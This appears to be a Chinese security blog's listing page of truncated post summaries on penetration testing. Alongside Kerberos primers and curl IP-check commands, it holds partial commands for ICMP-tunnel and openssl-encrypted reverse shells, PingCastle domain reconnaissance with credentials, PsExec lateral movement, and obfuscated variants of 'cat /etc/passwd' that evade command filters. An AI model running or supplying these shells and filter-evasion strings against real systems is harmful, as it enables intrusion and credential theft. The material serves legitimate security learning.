摘要:
有时候总是不确定个人ip地址是多少,代理究竟挂上没,如下命令可以帮到你 curl ipinfo.io curl cip.cc curl myip.ipip.net curl ifconfig.me curl http://members.3322.org/dyndns/getip 阅读全文
|
摘要:
有时候总是不确定个人ip地址是多少,代理究竟挂上没,如下命令可以帮到你 curl ipinfo.io curl cip.cc curl myip.ipip.net curl ifconfig.me curl http://members.3322.org/dyndns/getip 阅读全文
摘要:
利用 攻击机下载客户端并编译: git clone https://github.com/jamesbarlow/icmptunnel.git cd icmptunnel/ make ./icmptunnel -s 开启服务 ./icmptunnel -s & 可实现放置到后台 /sbin/ifco 阅读全文
摘要:
利用 当不知道对方公网ip可使用tcpdump对icmp包进行抓取,目标机器ping攻击机ip即可 windows 攻击机: 必须开启禁ping,才可通过icmp反弹shell sysctl -w net.ipv4.icmp_echo_ignore_all=1 git clone https://g 阅读全文
摘要:
简介 在Kerberos认证中的客户端与server中,仅向server证明了客户端就是客户端,但server并不知道客户端到底能够访问哪些资源。 域环境中若要知道某个用户具备哪些权限,需要提供相关sid及组sid,server仅信任KDC提供的用户具备哪些权限,KDC必须告知server关于用户的 阅读全文
摘要:
简介 Kerberos协议通过密钥系统为客户端与服务提供认证服务,为了解决当客户端去访问一个服务器的某服务时,服务器如何判断该对象是否有相关权限来访问自己的服务,同时数据在传输过程中即便被篡改也不会影响整个通讯的安全 概念 DC(Domain Controller)域控 KDC(Key Distri 阅读全文
摘要:
加密Tcp反向 攻击机: openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes openssl s_server -quiet -key key.pem -cert cert.pem -po 阅读全文
摘要:
#ifndef UNICODE #define UNICODE #endif #pragma comment(lib, "netapi32.lib") #include <stdio.h> #include <assert.h> #include <windows.h> #include <lm.h 阅读全文
摘要:
域外windows 一句话域内搜集 PingCastle.exe --server 192.168.3.142 --user 0day.org\jack --password admin!@#45 --protocol ADWSThenLDAP --healthcheck --explore-tru 阅读全文
摘要:
简介 PsExec 是由 Mark Russinovich 创建的 Sysinternals Suite 中包含的工具。最初,它旨在作为系统管理员的便利工具,以便他们可以通过在远程主机上运行命令来执行维护任务。PsExec 可以算是一个轻量级的 telnet 替代工具,它使您无需手动安装客户端软件即 阅读全文
摘要:
cat /etc/passwd cat /e"t"c/pa"s"swd cat /'e'tc/pass'wd' cat /etc/pa??wd cat /etc/p*wd cat /et''c/pass''wd cat /et${test}c/pa${hah}sswd IFS=,;`cat<<<ca 阅读全文
|